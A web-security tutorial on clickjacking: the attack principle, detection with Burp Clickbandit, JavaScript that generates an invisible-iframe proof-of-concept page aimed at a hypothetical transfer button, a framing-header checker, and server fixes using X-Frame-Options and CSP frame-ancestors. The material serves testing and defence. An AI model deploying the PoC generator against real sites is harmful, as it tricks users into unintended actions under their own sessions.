1. Vulnerability principle
Clickjacking is a visual deception attack. The attacker loads the target page inside a transparent, invisible iframe overlaid on a page they control, then lures the user into clicking what looks like a harmless element on the attacker's page. By positioning the iframe so that a sensitive button on the target page (a transfer, delete or confirm control) sits exactly under the decoy, the attacker turns the user's click into an action on the target site, performed with the user's own authenticated session.
2. Vulnerability detection
Open Burp Suite and copy the Clickbandit attack script to the clipboard (Burp menu, Burp Clickbandit).
Open the target page in the browser, press F12 to open the developer tools, switch to the Console tab and paste the script.
Clickbandit's toolbar appears over the page. Click "Start", perform the clicks the victim should be tricked into making, then click "Finish" to generate the PoC page. Open the saved PoC: if the target renders inside the invisible frame and the recorded clicks go through, the page is vulnerable; if the browser refuses to frame it, it is protected. A quicker first check is to look at the response headers in Burp for X-Frame-Options or a Content-Security-Policy frame-ancestors directive.
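The two halves of the check above, as an added example that is not code from the original article or from Burp Clickbandit: a minimal generator for the attacker page described in section 1 (transparent iframe shifted so the target button sits under a decoy), and a function that decides from a response's headers whether an arbitrary origin could frame the page, following the same precedence rules browsers apply. The target URL, coordinates and header sets are constructed for illustration and the hosts are hypothetical.

```javascript
// Added example, not code from the original article or from Burp Clickbandit:
// a minimal clickjacking PoC generator plus a header-based check of whether a
// response may be framed. The target URL, coordinates and header sets are
// constructed for illustration (hypothetical hosts, not real sites).

// Where the decoy element sits on the attacker's page, in CSS pixels.
const DECOY = { top: 120, left: 120 };

// Build the attacker page. The victim page is framed with opacity 0 (invisible
// but still the topmost element, so it receives the click) and offset so that
// the victim's button at (buttonX, buttonY) inside the frame lands exactly
// under the decoy button.
function buildPocHtml(targetUrl, buttonX, buttonY) {
  const top = DECOY.top - buttonY;
  const left = DECOY.left - buttonX;
  return [
    '<!DOCTYPE html><html><body>',
    `<button style="position:absolute;top:${DECOY.top}px;left:${DECOY.left}px;z-index:1">Claim prize</button>`,
    `<iframe src="${targetUrl}" style="position:absolute;top:${top}px;left:${left}px;` +
      'width:1200px;height:900px;border:0;opacity:0;z-index:2"></iframe>',
    '</body></html>',
  ].join('\n');
}

// HTTP header names are case-insensitive, so normalise them before lookup.
function lowerKeys(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) out[name.toLowerCase()] = value;
  return out;
}

// Decide whether an arbitrary attacker origin could frame the response.
// Only the enforced Content-Security-Policy header is consulted (a Report-Only
// policy blocks nothing). frame-ancestors takes precedence: CSP Level 2 tells
// browsers to ignore X-Frame-Options when that directive is present.
function assessFraming(headers) {
  const h = lowerKeys(headers);
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map((d) => d.trim()).find((d) => /^frame-ancestors(\s|$)/i.test(d));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1).map((s) => s.toLowerCase());
    // '*' or a bare scheme such as https: lets any host on that scheme frame the page.
    const open = sources.some((s) => s === '*' || s === 'http:' || s === 'https:');
    return { framable: open, source: 'csp', detail: fa };
  }
  const xfo = h['x-frame-options'];
  if (xfo === undefined) return { framable: true, source: 'none', detail: 'no framing header' };
  // Mirrors the HTML standard's X-Frame-Options check: split on commas, drop
  // duplicates; a list of differing values that contains deny/sameorigin/allowall
  // is blocked, any other unrecognised value (including the deprecated ALLOW-FROM)
  // is ignored and leaves the page framable.
  const values = [...new Set(xfo.split(',').map((v) => v.trim().toLowerCase()))];
  if (values.length > 1) {
    const blocked = values.some((v) => ['deny', 'sameorigin', 'allowall'].includes(v));
    return { framable: !blocked, source: 'xfo', detail: xfo };
  }
  if (values[0] === 'deny' || values[0] === 'sameorigin') {
    return { framable: false, source: 'xfo', detail: xfo };
  }
  const note = values[0].startsWith('allow-from') ? ' (ALLOW-FROM is ignored by current browsers)' : '';
  return { framable: true, source: 'xfo', detail: xfo + note };
}

// Constructed sample responses, as they might appear in Burp's response tab.
const samples = {
  unprotected: {},
  legacyAllowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://trusted.example' },
  hardened: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'", 'X-Frame-Options': 'SAMEORIGIN' },
};
for (const [name, headers] of Object.entries(samples)) {
  console.log(name, assessFraming(headers));
}
console.log(buildPocHtml('https://victim.example/transfer', 300, 400));
```

Feed assessFraming the headers of the response you see in Burp; a result with framable: true means the PoC from buildPocHtml (or Clickbandit) is worth trying, and the detail field tells you which header, if any, is doing the work.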
3. Suggested fix
- X-Frame-Options is the simplest and most widely supported defence. It takes one of three values: DENY, SAMEORIGIN, ALLOW-FROM origin
DENY: the browser refuses to render the page inside any frame, even one served from the same site
SAMEORIGIN: the page may only be framed by pages from the same origin
ALLOW-FROM origin: allows a single named origin to frame the page. This value is deprecated and should not be used: Chrome and Safari never supported it, Firefox removed it, and a browser that does not recognise the value ignores the header entirely, leaving the page framable by anyone. To allow specific third-party sites, use the Content-Security-Policy frame-ancestors directive instead, which accepts an allowlist and takes precedence over X-Frame-Options when both are present; send both headers so that older browsers without CSP support still get DENY or SAMEORIGIN.
- Apache: to send the X-Frame-Options header on every response, enable mod_headers and add this line to the site configuration: Header always append X-Frame-Options SAMEORIGIN (using `set` instead of `append` is preferable when the application behind Apache may already emit the header, since it replaces the value rather than accumulating a list)
- nginx: to have nginx send the X-Frame-Options header, add the following line in the `http`, `server` or `location` block: add_header X-Frame-Options SAMEORIGIN; (note that a block containing its own add_header directives does not inherit add_header from the enclosing level, so a `location` with other add_header lines must repeat this one)
- IIS: to have IIS send the X-Frame-Options response header, add the following to the Web.config file:
    <system.webServer>
      <httpProtocol>
        <customHeaders>
          <add name="X-Frame-Options" value="SAMEORIGIN" />
        </customHeaders>
      </httpProtocol>
    </system.webServer>
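When the header is set by the application rather than the web server, the two anti-framing headers need to agree with each other. The following is an added example, not code from the original article or any framework: it derives a matching X-Frame-Options and Content-Security-Policy frame-ancestors pair from an allowlist of ancestor origins, falling back to SAMEORIGIN (never the deprecated ALLOW-FROM) when partners are allowed, and wraps that in an Express-style middleware. The partner origins used are made up and the middleware's request/response shape is assumed.

```javascript
// Added example, not from the original article: derive a consistent pair of
// anti-framing headers from an allowlist of ancestor origins, so that the
// X-Frame-Options value never contradicts the Content-Security-Policy value.
// The partner origins in the usage below are made up.

// Accept 'self' or an origin (scheme://host[:port]) with no path, and reject
// wildcards and bare schemes, which would let any site frame the page.
function validateAncestor(source) {
  if (source === "'self'") return;
  if (!/^https?:\/\/[A-Za-z0-9.-]+(:\d+)?$/.test(source)) {
    throw new Error(`unsupported frame-ancestors source: ${source}`);
  }
}

function framingHeadersFor(allowedAncestors) {
  allowedAncestors.forEach(validateAncestor);
  if (allowedAncestors.length === 0) {
    return {
      'X-Frame-Options': 'DENY',
      'Content-Security-Policy': "frame-ancestors 'none'",
    };
  }
  if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    return {
      'X-Frame-Options': 'SAMEORIGIN',
      'Content-Security-Policy': "frame-ancestors 'self'",
    };
  }
  // X-Frame-Options cannot express a list of origins and ALLOW-FROM is ignored
  // by current browsers, so the allowlist lives in CSP. Browsers that honour
  // frame-ancestors ignore X-Frame-Options; the SAMEORIGIN fallback only
  // reaches clients without CSP Level 2 support, where partner embeds break
  // but the page stays protected (fail closed rather than open).
  return {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': `frame-ancestors ${allowedAncestors.join(' ')}`,
  };
}

// Express-style middleware (hypothetical app; req/res/next have the usual shape).
function antiFramingMiddleware(allowedAncestors) {
  const headers = framingHeadersFor(allowedAncestors);
  return (req, res, next) => {
    for (const [name, value] of Object.entries(headers)) res.setHeader(name, value);
    next();
  };
}

console.log(framingHeadersFor([]));
console.log(framingHeadersFor(["'self'", 'https://partner.example']));
```

Compute the headers once at startup, as antiFramingMiddleware does, so that a typo in the allowlist fails the deployment instead of silently shipping a page that any site can frame.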